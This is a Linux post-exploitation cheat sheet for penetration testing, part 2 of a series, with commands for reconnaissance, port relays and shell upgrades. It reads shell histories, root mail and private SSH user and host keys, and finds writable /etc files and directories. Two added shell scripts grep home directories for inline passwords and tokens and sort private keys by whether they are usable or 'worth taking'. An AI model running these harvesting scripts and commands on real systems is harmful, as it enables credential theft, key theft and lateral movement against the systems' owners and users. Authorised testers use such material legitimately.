Below are some useful Linux commands for penetration testing, target reconnaissance and capability assessment. Use them for good, not for evil. Part 1 is here.
Identify operating system, kernel version
$ cat /etc/issue
$ cat /etc/*-release
$ cat /etc/lsb-release
$ cat /etc/redhat-release
$ cat /proc/version
$ uname -a
$ uname -mrs
$ rpm -q kernel
$ dmesg | grep Linux
$ ls /boot | grep vmlinuz-
Identify which users and hosts are communicating with the system: open sockets and the processes behind them, services enabled at boot, and recent logins.
$ lsof -i # every process holding a network socket
$ lsof -i :80 # only sockets on port 80
$ grep -w 80 /etc/services # map a port number to its conventional service (-w avoids also matching 8080, 1080, ...)
$ chkconfig --list # SysV services per runlevel (RHEL/CentOS); on systemd hosts use: systemctl list-unit-files --state=enabled
$ chkconfig --list | grep 3:on # services started in runlevel 3 (multi-user, networked)
$ last # recent logins, with the source host of each
$ w # who is logged in right now and what they are running
$ netstat -antup # all TCP/UDP sockets, numeric, with owning PID/program (other users' PIDs need root)
$ netstat -antpx # as above plus Unix domain sockets
$ netstat -tulpn # listening TCP/UDP sockets only; on hosts without net-tools use: ss -tulpn
Use scp to copy to/from a remote machine.
# Copy remote file to local host:
$ scp <user>@<remote_host>:<remote_file> /some/local/directory
# Copy local file to remote host:
$ scp <local_file> <user>@<remote_host>:/some/remote/directory
# Copy local directory to remote directory:
$ scp -r <local_dir> <user>@<remote_host>:/some/remote/directory/<remote_dir>
# Copy a file from one remote host to another (without -3, host1 opens the connection to host2 itself and so needs credentials for host2; with -3 the data is relayed through the local machine):
$ scp your_username@<host1>:/some/remote/directory/stuff.txt your_username@<host2>:/some/remote/directory/
# Improve scp performance by choosing a faster cipher. The original suggests "-c blowfish", which no longer works: blowfish-cbc was removed in OpenSSH 7.6. List what your client supports with "ssh -Q cipher" and pick one the server also offers, e.g.:
$ scp -c aes128-gcm@openssh.com <local_file> <user>@<remote_host>:/some/remote/directory
If port forwarding is possible, redirect traffic and interact with it from another vantage point.
# ssh -L [local bind port]:[target host]:[target port] [user]@[ssh server]   -> listen here, exit through the server
# ssh -R [remote bind port]:[target host]:[target port] [user]@[ssh server]  -> listen on the server, exit through here
$ ssh -L 8080:127.0.0.1:80 <user>@<remote_host> # connections to localhost:8080 reach port 80 on remote_host's loopback
$ ssh -R 8080:127.0.0.1:80 <user>@<remote_host> # connections to remote_host:8080 reach port 80 on this machine's loopback (sshd binds that port to loopback only unless GatewayPorts is enabled)
# Relay with netcat and a named pipe when ssh is not an option (traditional/GNU netcat syntax; OpenBSD nc takes "nc -l 8080" without -p):
# mknod backpipe p ; nc -l -p [listen port] 0<backpipe | nc [target IP] [target port] 1>backpipe
$ mknod backpipe p ; nc -l -p 8080 0<backpipe | nc 10.1.1.251 80 1>backpipe # Port relay: 8080 here -> 10.1.1.251:80
# The same relay with both directions logged (the original lists it twice, as "Proxy" and "Proxy monitor"): inflow collects what the client sent, outflow what the server answered. The listener exits after one connection, so wrap it in a loop for repeated use:
$ mknod backpipe p ; nc -l -p 8080 0<backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe # Proxy/monitor: 8080 -> localhost:80
Retrieve the routing table and the cached IP-to-MAC (ARP) entries. route and arp come from net-tools; on hosts that only ship iproute2 use "ip route" and "ip neigh".
$ route
$ /sbin/route -nee # numeric, extended output
$ arp -e
What has the user been doing? Any passwords in plain text?
$ cat ~/.bash_history
$ cat ~/.nano_history
$ cat ~/.atftp_history
$ cat ~/.mysql_history
$ cat ~/.php_history
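Reading these files one at a time does not scale to a box with many home directories. The script below is an added example, not code from the original cheat sheet: it greps a home directory's history files for command shapes that carry a credential inline (mysql -pSECRET, sshpass -p, curl -u, exported *_SECRET_* variables, CREATE USER ... IDENTIFIED BY). The file list, the regex and the function names (hist_secrets, hist_secrets_count, make_sample_home) are my assumptions, a heuristic starting point rather than an exhaustive list, and the sample history it builds is constructed data.

```shell
#!/bin/sh
# Added example (not from the original cheat sheet): grep a home directory's
# history files for commands that carry a credential on the command line.
# The file list and regex below are assumptions, a heuristic starting point.

# History files worth reading; extends the list on the page.
HIST_FILES=".bash_history .zsh_history .sh_history .nano_history .atftp_history .mysql_history .psql_history .php_history"

# Command shapes that embed a secret inline (matched case-insensitively).
# "-p[^ ]" matters: mysql only leaks the password when it is glued to -p;
# a bare "-p" prompts for it and leaves nothing in the history.
SECRET_RE='mysql[a-z]* .*(-p[^ ]|--password=)|sshpass -p|curl .*(-u |--user )|wget .*--password=|smbclient .*-U|(pass|secret|token|key)[a-z_]*=|openssl .*pass:|identified by|set password|password\('

# hist_secrets HOME: print "file:line:command" for every suspicious line.
hist_secrets() {
  home=$1
  for f in $HIST_FILES; do
    [ -r "$home/$f" ] || continue
    # under "set -e -o pipefail" a file with no hits would abort; || true prevents that
    grep -niE "$SECRET_RE" "$home/$f" | sed "s|^|$f:|" || true
  done
}

# hist_secrets_count HOME: number of suspicious lines, for quick triage.
hist_secrets_count() {
  hist_secrets "$1" | wc -l | tr -d ' '
}

# make_sample_home: constructed home directory with fake history entries
# (demonstration data only); prints its path.
make_sample_home() {
  d=$(mktemp -d)
  cat > "$d/.bash_history" <<'EOF'
cd /var/www
mysql -u root -pS3cretPass wordpress
ls -la
sshpass -p 'hunter2' ssh admin@10.0.0.5
curl -u deploy:t0ken https://git.example.internal/api/v1
export AWS_SECRET_ACCESS_KEY=abcd1234
vim /etc/hosts
mysql -u root -p
EOF
  cat > "$d/.mysql_history" <<'EOF'
select * from users;
CREATE USER 'app'@'localhost' IDENTIFIED BY 'Winter2024!';
SET PASSWORD FOR 'root'@'localhost' = PASSWORD('toor');
EOF
  printf '%s\n' "$d"
}

# When run directly under bash: scan the home directory given as $1, or the sample.
if [ -n "${BASH_SOURCE:-}" ] && [ "$BASH_SOURCE" = "$0" ]; then
  hist_secrets "${1:-$(make_sample_home)}"
fi
```

On the sample this flags six lines and skips the bare "mysql -u root -p", which prompted for the password instead of recording it. Run it as "sh script.sh /home/<user>" for each home directory you can read, and extend SECRET_RE with whatever tooling the target's users actually run.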
Retrieve useful user information
$ cat ~/.bashrc
$ cat ~/.profile
$ cat /var/mail/root
$ cat /var/spool/mail/root
Get any private/public key information
$ cat ~/.ssh/authorized_keys
$ cat ~/.ssh/identity.pub
$ cat ~/.ssh/identity
$ cat ~/.ssh/id_rsa.pub
$ cat ~/.ssh/id_rsa
$ cat ~/.ssh/id_dsa.pub
$ cat ~/.ssh/id_dsa
$ cat /etc/ssh/ssh_config
$ cat /etc/ssh/sshd_config
$ cat /etc/ssh/ssh_host_dsa_key.pub
$ cat /etc/ssh/ssh_host_dsa_key
$ cat /etc/ssh/ssh_host_rsa_key.pub
$ cat /etc/ssh/ssh_host_rsa_key
$ cat /etc/ssh/ssh_host_key.pub
$ cat /etc/ssh/ssh_host_key
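Once key files are located, the useful question is which ones are worth taking. The script below is an added example, not code from the original cheat sheet: for each private key it reports the format, whether it is passphrase-protected, and whether its file mode would make ssh refuse it (ssh ignores private keys readable by group or other). For the OpenSSH format it decodes the base64 body and reads the cipher name that follows the "openssh-key-v1" magic; "none" means the key is stored in the clear. The function names (key_status, find_private_keys, make_sample_keys) are mine, and the sample keys it builds are constructed stubs with dummy bodies, not real key material.

```shell
#!/bin/sh
# Added example (not from the original cheat sheet): triage private key files.
# Output per key: "FILE <format> <encrypted|plaintext> <perm-ok|perm-loose>".
# The sample keys below are constructed stubs, not real key material.

# key_status FILE: classify one file.
key_status() {
  f=$1
  case "$(head -n 1 "$f")" in
    "-----BEGIN OPENSSH PRIVATE KEY-----")
      fmt=openssh
      # strip the armor, decode, keep the first 64 bytes, split on any byte that
      # cannot be part of a cipher name: line 1 is the magic, line 2 the cipher
      cipher=$(sed '1d;$d' "$f" | tr -d '\n' | base64 -d 2>/dev/null | head -c 64 \
               | tr -cs 'a-z0-9@.-' '\n' | sed -n '2p')
      if [ "$cipher" = none ]; then enc=plaintext; else enc=encrypted; fi ;;
    "-----BEGIN RSA PRIVATE KEY-----"|"-----BEGIN DSA PRIVATE KEY-----"|"-----BEGIN EC PRIVATE KEY-----")
      fmt=pem
      # legacy PEM keys announce encryption in a header line
      if sed -n '2p' "$f" | grep -q '^Proc-Type: 4,ENCRYPTED'; then enc=encrypted; else enc=plaintext; fi ;;
    "-----BEGIN ENCRYPTED PRIVATE KEY-----") fmt=pkcs8; enc=encrypted ;;
    "-----BEGIN PRIVATE KEY-----")           fmt=pkcs8; enc=plaintext ;;
    *) printf '%s not-a-private-key\n' "$f"; return 0 ;;
  esac
  # group/other permission bits are columns 5-10 of "ls -l"; any r or w there
  # makes ssh complain "UNPROTECTED PRIVATE KEY FILE" and ignore the key
  case "$(ls -l "$f" | cut -c5-10)" in
    *r*|*w*) perm=perm-loose ;;
    *)       perm=perm-ok ;;
  esac
  printf '%s %s %s %s\n' "$f" "$fmt" "$enc" "$perm"
}

# find_private_keys ROOT: key_status for every small file whose first line is a
# PRIVATE KEY armor header; public keys and other files are skipped.
find_private_keys() {
  find "$1" -type f -size -64k 2>/dev/null | while read -r f; do
    if head -n 1 "$f" 2>/dev/null | grep -q 'PRIVATE KEY-----$'; then
      key_status "$f"
    fi
  done | sort
}

# make_sample_keys: constructed key files with dummy bodies; prints the directory.
make_sample_keys() {
  d=$(mktemp -d)
  # OpenSSH format, unencrypted: magic, cipher "none", kdf "none", empty kdf options
  { printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----'
    printf 'openssh-key-v1\000\000\000\000\004none\000\000\000\004none\000\000\000\000' | base64
    printf '%s\n' '-----END OPENSSH PRIVATE KEY-----'; } > "$d/id_ed25519"
  # OpenSSH format, encrypted: cipher "aes256-ctr", kdf "bcrypt"
  { printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----'
    printf 'openssh-key-v1\000\000\000\000\012aes256-ctr\000\000\000\006bcrypt' | base64
    printf '%s\n' '-----END OPENSSH PRIVATE KEY-----'; } > "$d/id_rsa_enc"
  # legacy PEM with an encryption header, left world-readable
  cat > "$d/legacy.pem" <<'EOF'
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF

c3R1YiBib2R5LCBub3QgYSByZWFsIGtleQ==
-----END RSA PRIVATE KEY-----
EOF
  printf 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFakeFakeFakeFakeFakeFakeFakeFake user@host\n' > "$d/id_ed25519.pub"
  chmod 600 "$d/id_ed25519" "$d/id_rsa_enc"
  chmod 644 "$d/legacy.pem"
  printf '%s\n' "$d"
}

# When run directly under bash: scan the directory given as $1, or the sample.
if [ -n "${BASH_SOURCE:-}" ] && [ "$BASH_SOURCE" = "$0" ]; then
  find_private_keys "${1:-$(make_sample_keys)}"
fi
```

A plaintext key with perm-ok is immediately usable with "ssh -i"; an encrypted one needs the passphrase (often sitting in the history files above) or an offline crack, and a perm-loose key tells you the owner is careless, which is worth knowing on its own.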
If in a restricted shell or a jail, can you break out of it, or at least get a proper interactive TTY?
$ python -c 'import pty;pty.spawn("/bin/bash")' # spawn bash on a pseudo-terminal; also the usual way to upgrade a dumb reverse shell
>>> import os; os.system('/bin/bash') # from inside a Python prompt (the original gives this as "echo os.system('/bin/bash')", which typed at a shell only echoes the text)
$ /bin/sh -i # force an interactive shell
Where can we write to, and execute from?
A few ‘common’ places: /tmp, /var/tmp, /dev/shm (often mounted noexec, so check the mount options before relying on them)
$ find / -writable -type d 2>/dev/null # directories writable by the current user (GNU find; honours ownership, group membership and ACLs)
$ find / -perm -222 -type d 2>/dev/null # directories with the write bit set for user, group and other
$ find / -perm -o+w -type d 2>/dev/null # world-writable directories
$ find / -perm -o+x -type d 2>/dev/null # world-searchable (executable) directories
$ find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null # world-writable and searchable directories; add "! -perm -1000" to drop sticky-bit directories such as /tmp, where other users' files cannot be replaced
Which configuration files in /etc/ can be written? Can we reconfigure a service?
The ls|awk filters only look at the mode string, so they list files that some owner, group or other user could write; "find -writable" asks the kernel whether the current user can. 2>/dev/null belongs on ls, not awk, to hide permission errors.
$ ls -aRl /etc/ 2>/dev/null | awk '$1 ~ /^[-d].*w/' # files and directories with any write bit set (symlinks are skipped: they always show rwxrwxrwx)
$ ls -aRl /etc/ 2>/dev/null | awk '$1 ~ /^..w/' # writable by owner
$ ls -aRl /etc/ 2>/dev/null | awk '$1 ~ /^.....w/' # writable by group
$ ls -aRl /etc/ 2>/dev/null | awk '$1 ~ /w.$/' # writable by other (world)
$ find /etc/ -readable -type f 2>/dev/null # files the current user can read
$ find /etc/ -maxdepth 1 -readable -type f 2>/dev/null # same, top level of /etc only (-maxdepth must precede the tests)